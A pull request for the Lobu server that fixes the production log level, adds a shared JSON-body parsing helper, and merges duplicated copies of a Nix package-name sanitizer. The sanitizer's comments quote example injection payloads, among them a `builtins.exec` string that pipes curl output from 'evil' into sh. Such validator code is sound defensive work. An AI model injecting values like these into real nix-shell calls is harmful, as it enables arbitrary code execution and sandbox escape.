### PR TITLE
fix(server): correct prod log level + consolidate nix sanitizer & JSON-body parsing

### DIFF
--- a/.github/workflows/security-tests.yml
+++ b/.github/workflows/security-tests.yml
@@ -83,9 +83,10 @@ jobs:
       - name: Install dependencies
         run: bun install
 
-      - name: Build core (server tests import from @lobu/core dist)
+      - name: Build core + connector-sdk (server tests import from their dist)
         run: |
           cd packages/core && bun run build && cd ../..
+          cd packages/connector-sdk && bun run build && cd ../..
 
       - name: Verify Postgres + pgvector
         run: |

--- a/packages/connector-sdk/package.json
+++ b/packages/connector-sdk/package.json
@@ -22,6 +22,16 @@
         "default": "./dist/define-connector.js"
       }
     },
+    "./nix-package": {
+      "import": {
+        "types": "./dist/nix-package.d.ts",
+        "default": "./dist/nix-package.js"
+      },
+      "require": {
+        "types": "./dist/nix-package.d.ts",
+        "default": "./dist/nix-package.js"
+      }
+    },
     "./identity-types": {
       "types": "./dist/identity-types.d.ts",
       "import": "./dist/identity-types.js"

--- a/packages/connector-sdk/src/index.ts
+++ b/packages/connector-sdk/src/index.ts
@@ -134,6 +134,8 @@ export type {
   PaginateByOffsetOptions,
 } from './pagination.js';
 export { paginateByCursor, paginateByOffset } from './pagination.js';
+// Nix package-name sanitizer (shared by gateway orchestrator + connector-worker)
+export { nixPackageAttrRef } from './nix-package.js';
 // Retry
 export { withHttpRetry } from './retry.js';
 // Scoring

--- a/packages/connector-sdk/src/nix-package.ts
+++ b/packages/connector-sdk/src/nix-package.ts
@@ -1,0 +1,66 @@
+/**
+ * Validate an operator/connector-declared Nix package name and re-emit it as an
+ * explicit `pkgs.<...>` attribute reference.
+ *
+ * `nix-shell -p` evaluates each argument as a Nix *expression*, so an
+ * unvalidated value like `x; builtins.exec ["sh" "-c" "curl evil|sh"]` or
+ * `import ./evil.nix` would run arbitrary code at evaluation time. We never
+ * forward the raw string: it must be a strict leaf identifier
+ * (`^[a-z0-9_][a-z0-9_-]*$`) or a `<known-namespace>.<leaf>` attr path, and it
+ * is re-emitted as an explicit `pkgs.<...>` reference.
+ *
+ * Shared by the gateway orchestrator (spawns the worker via `nix-shell`) and
+ * the connector-worker executor (spawns connectors via `nix-shell`) so the
+ * connector path can never become a weaker door than the gateway path. This
+ * used to be two hand-synced copies kept "in lockstep" by comment — a
+ * sandbox-escape drift hazard if one allow-list changed without the other.
+ */
+
+const NIX_PACKAGE_NAMESPACES = new Set([
+  'python3Packages',
+  'python311Packages',
+  'python312Packages',
+  'nodePackages',
+  'perlPackages',
+  'rubyPackages',
+  'haskellPackages',
+  'rPackages',
+  'ocamlPackages',
+  'luaPackages',
+]);
+
+const NIX_LEAF_RE = /^[a-z0-9_][a-z0-9_-]*$/;
+const NIX_ATTR_LEAF_RE = /^[a-zA-Z0-9_][a-zA-Z0-9_-]*$/;
+
+/**
+ * @param makeError factory for the thrown error so each caller keeps its own
+ *   error type (the gateway wraps it in an `OrchestratorError`). Defaults to a
+ *   plain `Error`.
+ */
+export function nixPackageAttrRef(
+  pkg: string,
+  makeError: (message: string) => Error = (message) => new Error(message)
+): string {
+  // Defence in depth: reject obvious shell/Nix metacharacters and non-strings
+  // up front (callers may pass attacker-influenced values).
+  if (typeof pkg !== 'string' || /[\s;&|`$(){}<>'"\\!*?#]/.test(pkg)) {
+    throw makeError(`Invalid nix package name: ${pkg}`);
+  }
+  const dot = pkg.indexOf('.');
+  if (dot === -1) {
+    if (!NIX_LEAF_RE.test(pkg)) {
+      throw makeError(`Invalid nix package name: ${pkg}`);
+    }
+    return `pkgs.${pkg}`;
+  }
+  const namespace = pkg.slice(0, dot);
+  const leaf = pkg.slice(dot + 1);
+  if (
+    !NIX_PACKAGE_NAMESPACES.has(namespace) ||
+    leaf.includes('.') ||
+    !NIX_ATTR_LEAF_RE.test(leaf)
+  ) {
+    throw makeError(`Invalid nix package name: ${pkg}`);
+  }
+  return `pkgs.${namespace}.${leaf}`;
+}

--- a/packages/connector-worker/src/executor/subprocess.ts
+++ b/packages/connector-worker/src/executor/subprocess.ts
@@ -12,6 +12,7 @@ import { createRequire } from 'node:module';
 import { dirname, join } from 'node:path';
 import { fileURLToPath } from 'node:url';
 import type { EventEnvelope } from '@lobu/connector-sdk';
+import { nixPackageAttrRef } from '@lobu/connector-sdk/nix-package';
 import type {
   ExecutionHooks,
   ExecutionOptions,
@@ -39,53 +40,9 @@ function shellQuote(value: string): string {
   return `'${value.replace(/'/g, `'\\''`)}'`;
 }
 
-// Kept in lockstep with the gateway's nixPackageAttrRef allow-list
-// (packages/server/src/gateway/orchestration/impl/embedded-deployment.ts).
-const NIX_PACKAGE_NAMESPACES = new Set([
-  'python3Packages',
-  'python311Packages',
-  'python312Packages',
-  'nodePackages',
-  'perlPackages',
-  'rubyPackages',
-  'haskellPackages',
-  'rPackages',
-  'ocamlPackages',
-  'luaPackages',
-]);
-const NIX_LEAF_RE = /^[a-z0-9_][a-z0-9_-]*$/;
-const NIX_ATTR_LEAF_RE = /^[a-zA-Z0-9_][a-zA-Z0-9_-]*$/;
-
-/**
- * Validate an operator/connector-declared nix package name and re-emit it as an
- * explicit `pkgs.<...>` attribute reference. `nix-shell -p` evaluates each
- * argument as a Nix *expression*, so an unvalidated value like
- * `x; builtins.exec ["sh" "-c" "curl evil|sh"]` or `import ./evil.nix` would
- * run arbitrary code at evaluation time. Mirrors the gateway-side
- * `nixPackageAttrRef` hardening so the connector path is not a weaker door.
- */
-export function nixPackageAttrRef(pkg: string): string {
-  if (typeof pkg !== 'string' || /[\s;&|`$(){}<>'"\\!*?#]/.test(pkg)) {
-    throw new Error(`Invalid nix package name: ${pkg}`);
-  }
-  const dot = pkg.indexOf('.');
-  if (dot === -1) {
-    if (!NIX_LEAF_RE.test(pkg)) {
-      throw new Error(`Invalid nix package name: ${pkg}`);
-    }
-    return `pkgs.${pkg}`;
-  }
-  const namespace = pkg.slice(0, dot);
-  const leaf = pkg.slice(dot + 1);
-  if (
-    !NIX_PACKAGE_NAMESPACES.has(namespace) ||
-    leaf.includes('.') ||
-    !NIX_ATTR_LEAF_RE.test(leaf)
-  ) {
-    throw new Error(`Invalid nix package name: ${pkg}`);
-  }
-  return `pkgs.${namespace}.${leaf}`;
-}
+// Re-exported for the executor's local tests; the canonical implementation
+// (shared with the gateway orchestrator) lives in @lobu/connector-sdk.
+export { nixPackageAttrRef };
 
 /**
  * exit_reason values surfaced to the runs table:

--- a/packages/server/src/gateway/orchestration/impl/embedded-deployment.ts
+++ b/packages/server/src/gateway/orchestration/impl/embedded-deployment.ts
@@ -9,6 +9,7 @@ import {
   OrchestratorError,
   retryWithBackoff,
 } from "@lobu/core";
+import { nixPackageAttrRef as nixPackageAttrRefBase } from "@lobu/connector-sdk/nix-package";
 import { intervals } from "../../../config/intervals.js";
 import { getDb } from "../../../db/client.js";
 import type { ModelProviderModule } from "../../modules/module-system.js";
@@ -461,67 +462,18 @@ function buildShellCommand(command: string, args: string[]): string {
 }
 
 /**
- * Nix attribute namespaces that hold per-language package sets. A skill may
- * reference a leaf inside one of these (e.g. `python3Packages.requests`); both
- * the namespace and the leaf are validated and the result is re-emitted as an
- * explicit `pkgs.<...>` reference — the raw string is never handed to nix.
- */
-const NIX_PACKAGE_NAMESPACES = new Set([
-  "python3Packages",
-  "python311Packages",
-  "python312Packages",
-  "nodePackages",
-  "perlPackages",
-  "rubyPackages",
-  "haskellPackages",
-  "rPackages",
-  "ocamlPackages",
-  "luaPackages",
-]);
-
-const NIX_LEAF_RE = /^[a-z0-9_][a-z0-9_-]*$/;
-const NIX_ATTR_LEAF_RE = /^[a-zA-Z0-9_][a-zA-Z0-9_-]*$/;
-
-/**
  * Validate a skill-declared Nix package name and return a safe Nix attribute
- * reference (`pkgs.<name>`). `nix-shell -p` evaluates each argument as a Nix
- * *expression*, so a bare string like `pkgs.fetchurl; builtins.exec ...` or
- * `import ./evil.nix` would run code at evaluation time. We never forward the
- * raw string: it must be a strict leaf identifier (`^[a-z0-9_][a-z0-9_-]*$`) or a
- * `<known-namespace>.<leaf>` attr path, and it is re-emitted as an explicit
- * `pkgs.<...>` attribute reference.
+ * reference (`pkgs.<name>`). Delegates to the canonical sanitizer in
+ * @lobu/connector-sdk (shared with the connector-worker executor so the two
+ * paths can't drift), wrapping failures in an `OrchestratorError` for the
+ * deployment surface.
  */
 export function nixPackageAttrRef(pkg: string): string {
-  // Defence in depth: reject obvious shell/Nix metacharacters up front.
-  if (/[\s;&|`$(){}<>'"\\!*?#]/.test(pkg)) {
-    throw new OrchestratorError(
-      ErrorCode.DEPLOYMENT_CREATE_FAILED,
-      `Invalid nix package name: ${pkg}`
-    );
-  }
-  const dot = pkg.indexOf(".");
-  if (dot === -1) {
-    if (!NIX_LEAF_RE.test(pkg)) {
-      throw new OrchestratorError(
-        ErrorCode.DEPLOYMENT_CREATE_FAILED,
-        `Invalid nix package name: ${pkg}`
-      );
-    }
-    return `pkgs.${pkg}`;
-  }
-  const namespace = pkg.slice(0, dot);
-  const leaf = pkg.slice(dot + 1);
-  if (
-    !NIX_PACKAGE_NAMESPACES.has(namespace) ||
-    leaf.includes(".") ||
-    !NIX_ATTR_LEAF_RE.test(leaf)
-  ) {
-    throw new OrchestratorError(
-      ErrorCode.DEPLOYMENT_CREATE_FAILED,
-      `Invalid nix package name: ${pkg}`
-    );
-  }
-  return `pkgs.${namespace}.${leaf}`;
+  return nixPackageAttrRefBase(
+    pkg,
+    (message) =>
+      new OrchestratorError(ErrorCode.DEPLOYMENT_CREATE_FAILED, message)
+  );
 }
 
 export class EmbeddedDeploymentManager extends BaseDeploymentManager {

--- a/packages/server/src/gateway/routes/shared/helpers.ts
+++ b/packages/server/src/gateway/routes/shared/helpers.ts
@@ -25,6 +25,26 @@ export function errorResponse(
 }
 
 /**
+ * Parse the request body as JSON, or return a 400 error response.
+ *
+ * Collapses the repeated `try { body = await c.req.json() } catch { 400 }`
+ * dance. Handlers call this and early-return when the result is a Response:
+ *
+ *   const body = await parseJsonBody<{ worker_id?: string }>(c);
+ *   if (body instanceof Response) return body;
+ */
+export async function parseJsonBody<T = unknown>(
+  c: Context,
+  message = "Invalid JSON body"
+): Promise<T | Response> {
+  try {
+    return (await c.req.json()) as T;
+  } catch {
+    return errorResponse(c, message, 400);
+  }
+}
+
+/**
  * Resolve the settings session payload, or return a 401 error response.
  *
  * Handlers should call this and early-return when the result is a Response:

--- a/packages/server/src/preview/slack.ts
+++ b/packages/server/src/preview/slack.ts
@@ -5,6 +5,7 @@ import type { Env } from '../index';
 import { errorMessage } from '../utils/errors';
 import logger from '../utils/logger';
 import { requireOrgUser } from '../utils/require-org-user';
+import { parseJsonBody } from '../gateway/routes/shared/helpers';
 
 // Slack Preview lets people trying Lobu locally talk to their agent through the
 // hosted "Lobu Developer" Slack workspace before they have their own bot token.
@@ -130,12 +131,11 @@ export async function createPreviewClaim(c: Context<{ Bindings: Env }>) {
   const auth = requireOrgUser(c);
   if (!auth) return c.json({ error: 'Unauthorized' }, 401);
 
-  let body: Record<string, unknown>;
-  try {
-    body = (await c.req.json()) as Record<string, unknown>;
-  } catch {
-    return c.json({ error: 'Invalid or missing JSON body' }, 400);
-  }
+  const body = await parseJsonBody<Record<string, unknown>>(
+    c,
+    'Invalid or missing JSON body'
+  );
+  if (body instanceof Response) return body;
 
   const agentId = typeof body.agent_id === 'string' ? body.agent_id.trim() : '';
   if (!agentId) return c.json({ error: 'agent_id is required' }, 400);

--- a/packages/server/src/utils/logger.ts
+++ b/packages/server/src/utils/logger.ts
@@ -13,9 +13,12 @@ import pino from 'pino';
  * - fatal (60): Fatal errors
  */
 
-// Determine log level from environment
+// Determine log level from environment.
+// Reads process.env.ENVIRONMENT (set to "production" by the Helm chart). The
+// previous `(globalThis as any).ENVIRONMENT` was never assigned anywhere, so
+// production silently logged at debug level (verbose + costly).
 const getLogLevel = (): pino.Level => {
-  const env = (globalThis as any).ENVIRONMENT || 'development';
+  const env = process.env.ENVIRONMENT || process.env.NODE_ENV || 'development';
 
   if (env === 'production') {
     return 'info';

--- a/packages/server/src/worker-api/device-auth-profiles.ts
+++ b/packages/server/src/worker-api/device-auth-profiles.ts
@@ -18,6 +18,7 @@ import {
 } from '../utils/auth-profiles';
 import { errorMessage } from '../utils/errors';
 import logger from '../utils/logger';
+import { parseJsonBody } from '../gateway/routes/shared/helpers';
 
 const BROWSER_KIND_SET: ReadonlySet<BrowserKind> = new Set(['chrome', 'brave', 'arc', 'edge']);
 
@@ -95,17 +96,13 @@ export async function listMyDeviceAuthProfiles(c: Context<{ Bindings: Env }>) {
  * (cdp_url). No cookies ever touch the server.
  */
 export async function createMyDeviceAuthProfile(c: Context<{ Bindings: Env }>) {
-  let body: {
+  const body = await parseJsonBody<{
     worker_id?: string;
     display_name?: string;
     browser_kind?: string;
     cdp_url?: string;
-  };
-  try {
-    body = await c.req.json();
-  } catch {
-    return c.json({ error: 'Invalid JSON body' }, 400);
-  }
+  }>(c);
+  if (body instanceof Response) return body;
   const workerId = (body.worker_id ?? '').trim();
   const displayName = (body.display_name ?? '').trim();
   const browserKind = (body.browser_kind ?? '').trim() as BrowserKind;
@@ -192,12 +189,8 @@ export async function deleteMyDeviceAuthProfile(c: Context<{ Bindings: Env }>) {
   if (!Number.isFinite(profileId)) {
     return c.json({ error: 'invalid profile id' }, 400);
   }
-  let body: { worker_id?: string };
-  try {
-    body = await c.req.json();
-  } catch {
-    return c.json({ error: 'Invalid JSON body' }, 400);
-  }
+  const body = await parseJsonBody<{ worker_id?: string }>(c);
+  if (body instanceof Response) return body;
   const workerId = (body.worker_id ?? '').trim();
   if (!workerId) {
     return c.json({ error: 'worker_id is required' }, 400);

--- a/packages/server/src/worker-api/device-feeds.ts
+++ b/packages/server/src/worker-api/device-feeds.ts
@@ -18,6 +18,7 @@ import type { Env } from '../index';
 import { errorMessage } from '../utils/errors';
 import logger from '../utils/logger';
 import { resolveDeviceWorkerForRequest } from './device-auth-profiles';
+import { parseJsonBody } from '../gateway/routes/shared/helpers';
 
 async function resolveDeviceConnection(
   c: Context<{ Bindings: Env }>,
@@ -102,18 +103,14 @@ export async function listMyDeviceFeeds(c: Context<{ Bindings: Env }>) {
  * for local.directory.files).
  */
 export async function createMyDeviceFeed(c: Context<{ Bindings: Env }>) {
-  let body: {
+  const body = await parseJsonBody<{
     worker_id?: string;
     connector_key?: string;
     feed_key?: string;
     display_name?: string;
     config?: Record<string, unknown>;
-  };
-  try {
-    body = await c.req.json();
-  } catch {
-    return c.json({ error: 'Invalid JSON body' }, 400);
-  }
+  }>(c);
+  if (body instanceof Response) return body;
   const workerId = (body.worker_id ?? '').trim();
   const connectorKey = (body.connector_key ?? '').trim();
   const feedKey = (body.feed_key ?? '').trim();
@@ -178,12 +175,8 @@ export async function deleteMyDeviceFeed(c: Context<{ Bindings: Env }>) {
   if (!Number.isFinite(feedId)) {
     return c.json({ error: 'invalid feed id' }, 400);
   }
-  let body: { worker_id?: string; connector_key?: string };
-  try {
-    body = await c.req.json();
-  } catch {
-    return c.json({ error: 'Invalid JSON body' }, 400);
-  }
+  const body = await parseJsonBody<{ worker_id?: string; connector_key?: string }>(c);
+  if (body instanceof Response) return body;
   const workerId = (body.worker_id ?? '').trim();
   const connectorKey = (body.connector_key ?? '').trim();
   if (!workerId || !connectorKey) {

--- a/packages/server/src/worker-api/device-management.ts
+++ b/packages/server/src/worker-api/device-management.ts
@@ -21,6 +21,7 @@ import { errorMessage } from '../utils/errors';
 import { recordLifecycleEvent } from '../utils/insert-event';
 import logger from '../utils/logger';
 import { getWorkspaceRole } from '../utils/organization-access';
+import { parseJsonBody } from '../gateway/routes/shared/helpers';
 
 /**
  * GET /api/me/devices
@@ -167,12 +168,11 @@ export async function mintDeviceChildToken(c: Context<{ Bindings: Env }>) {
     );
   }
 
-  let body: { platform?: string; label?: string };
-  try {
-    body = await c.req.json();
-  } catch {
-    return c.json({ error: 'Invalid or missing JSON body' }, 400);
-  }
+  const body = await parseJsonBody<{ platform?: string; label?: string }>(
+    c,
+    'Invalid or missing JSON body'
+  );
+  if (body instanceof Response) return body;
   const platform = (body.platform ?? '').trim();
   if (!platform) {
     return c.json({ error: 'platform is required' }, 400);

--- a/packages/server/src/worker-api/run-lifecycle.ts
+++ b/packages/server/src/worker-api/run-lifecycle.ts
@@ -35,6 +35,7 @@ import { configuredEmbeddingModelSqlLiteral } from '../utils/embeddings';
 import { insertEvent, recordLifecycleEvent } from '../utils/insert-event';
 import logger from '../utils/logger';
 import { authorizeRunForWorker } from './shared';
+import { parseJsonBody } from '../gateway/routes/shared/helpers';
 
 type DbClient = ReturnType<typeof getDb>;
 type SqlFragment = ReturnType<DbClient>;
@@ -610,7 +611,7 @@ export async function completeWatcherRun(c: Context<{ Bindings: Env }>) {
     return c.json({ error: 'Invalid runId' }, 400);
   }
 
-  let body: {
+  const body = await parseJsonBody<{
     worker_id: string;
     output?: string;
     error?: string;
@@ -618,12 +619,8 @@ export async function completeWatcherRun(c: Context<{ Bindings: Env }>) {
     exit_code?: number | null;
     exit_signal?: string | null;
     exit_reason?: 'ok' | 'error_message' | 'timeout' | 'oom' | 'crash';
-  };
-  try {
-    body = await c.req.json();
-  } catch {
-    return c.json({ error: 'Invalid or missing JSON body' }, 400);
-  }
+  }>(c, 'Invalid or missing JSON body');
+  if (body instanceof Response) return body;
 
   // allowTerminal: when the CLI agent already completed the run via MCP
   // complete_window, the exit report arrives against a terminal run — that's


### PR DESCRIPTION
A few consolidation items from a codebase audit, bundled into one server-side PR. Net around 73 fewer lines of product code.

The one real bug: logger.ts was reading the log level from (globalThis as any).ENVIRONMENT, which is never assigned anywhere, so production was silently logging at debug level the whole time. It now reads process.env.ENVIRONMENT, which is what the Helm chart actually sets. Confirmed with an ENVIRONMENT=production probe that the logger now emits at info.

The nixPackageAttrRef security sanitizer was copy-pasted byte-for-byte in the gateway orchestrator and the connector-worker executor, kept in sync by a comment. That is a sandbox-escape drift hazard if one allow-list ever changes without the other. It now lives once in @lobu/connector-sdk behind a narrow ./nix-package subpath export with no transitive deps, and takes an error-factory param so the gateway keeps its OrchestratorError while the worker keeps a plain Error. Both existing test files still pass against the shared impl.

Added a parseJsonBody route helper and adopted it at the seven handlers that hand-rolled the try/catch-around-c.req.json dance. The OAuth handlers that return an invalid_request shape are left as-is since that is a different error contract.

Review: make review came back bug_free 84, simplicity 88, 0 bugs, 0 blockers, low behavior-change risk. The local unit and integration suites had failures but all of them are in files this PR does not touch (cli init scaffold, sandbox isolated-vm under the local Node version, and the public-origin / public-pages tests that depend on a configured origin) and they are the known-environmental failures that reproduce on any branch locally. CI on Node 22 with fresh migrations is the authoritative gate.

A few audit items were deliberately left out because they are not safe no-behavior-change refactors: configsEqual and configsShallowEqual look like duplicates but one is deep and one is shallow, so unifying them changes multi-replica change-detection and needs its own tested PR; a shared generateId would have to paper over genuinely different id formats; and google_calendar moving to createHttpClient changes its error-message format, which needs a live-Calendar e2e first.

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/lobu-ai/codesmith/lobu/pr/1293"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1784170074&installation_id=136316292&pr_number=1293&repository=lobu-ai%2Flobu&return_to=https%3A%2F%2Fgithub.com%2Flobu-ai%2Flobu%2Fpull%2F1293&signature=655a523115dacd64fed5bb5e2f86f76751bcb8ea3c852739e2d8040712ac2b97"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>/codesmith</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Fixed environment configuration detection for logging.

* **Refactor**
  * Consolidated Nix package validation into a shared module for consistent handling across the system.
  * Unified JSON request parsing with a shared helper for standardized error handling across API routes.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->